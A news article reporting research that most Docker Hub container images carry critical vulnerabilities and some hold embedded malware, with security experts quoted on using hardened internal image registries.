Most Docker container images have critical flaws

Developers must act appropriately to prevent further spread of malware

Over two million container images hosted on the Docker Hub repository harbor at least one critical vulnerability, according to new research. 

In an analysis carried out by cyber security firm Prevasio on four million image containers, over half (51%) contained at least one critical vulnerability.

The research also found incidents of container images carrying embedded malware. It found 6,432 malicious or potentially harmful containers, representing 0.16% of all publicly available images at Docker Hub.

“Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coin miner, to then compile and execute it,” said Sergei Shevchenko, CTO at Prevasio.

In its report, Prevasio said if a developer takes a shortcut by fetching a pre-built image instead of composing a new image from scratch, there’s a viable risk that such pre-built images might come with a Trojan installed. If such an image ends up in production, the attackers may potentially access such containerized applications remotely via a backdoor.

Mark Bower, senior vice president at Comforte AG, told IT Pro that platforms like Kubernetes enable immense application delivery power. However, the built-in security controls reflect classical data-at-rest and transport encryption, perimeter, and access control-based security. 

“While these controls are important, the last decade has seen leading enterprises and data processors shift towards data-centric over perimeter controls to combat advanced malware, ransomware and insider risk to sensitive data,” Bower said.

“Fundamentally, to thwart the variations of malware and attacks from misconfiguration or API exploitation, a data-centric approach is vital even with advanced container and app orchestration ecosystems to avoid data compromise or attacks that can create havoc for data-hungry enterprises depending on them.”

Tim Mackey, principal security strategist at the Synopsys CyRC (Cybersecurity Research Centre), told IT Pro that when selecting an image from Docker Hub, a development team is implicitly stating that they trust the security practices of the author of that container image. 

“Such implicit trust is risky from a security perspective, which is why many organizations are now creating hardened container images where the image hardening process is managed by a dedicated team skilled in operating system hardening which is separate from the core development team.

"These hardened images are then pushed to an internal registry and policies are defined that only allow images originating from hardened images in that internal registry to execute in a production cluster,” Mackey said.

Featured Resources

Defeating ransomware with unified security from WatchGuard

How SMBs can defend against the onslaught of ransomware attacks

Free download

The IT expert’s guide to AI and content management

How artificial intelligence and machine learning could be critical to your business

Free download

The path to CX excellence

Four stages to thrive in the experience economy

Free download

Becoming an experience-based business

Your blueprint for a strong digital foundation

Free download

Recommended

Ransomware hackers break off from Babuk to join a new group
ransomware

Ransomware hackers break off from Babuk to join a new group

9 Sep 2021
Ragnar Locker vows to leak data if victim contacts the police
ransomware

Ragnar Locker vows to leak data if victim contacts the police

7 Sep 2021
Large US businesses are hackers' ideal ransomware targets
ransomware

Large US businesses are hackers' ideal ransomware targets

7 Sep 2021
Hackers use WebSVN to deploy new Mirai malware
malware

Hackers use WebSVN to deploy new Mirai malware

31 Aug 2021

Most Popular

What are the pros and cons of AI?
machine learning

What are the pros and cons of AI?

8 Sep 2021
Apple patches zero-day flaw abused by infamous NSO exploit
exploits

Apple patches zero-day flaw abused by infamous NSO exploit

14 Sep 2021
Google takes down map showing homes of 111,000 Guntrader customers
data breaches

Google takes down map showing homes of 111,000 Guntrader customers

2 Sep 2021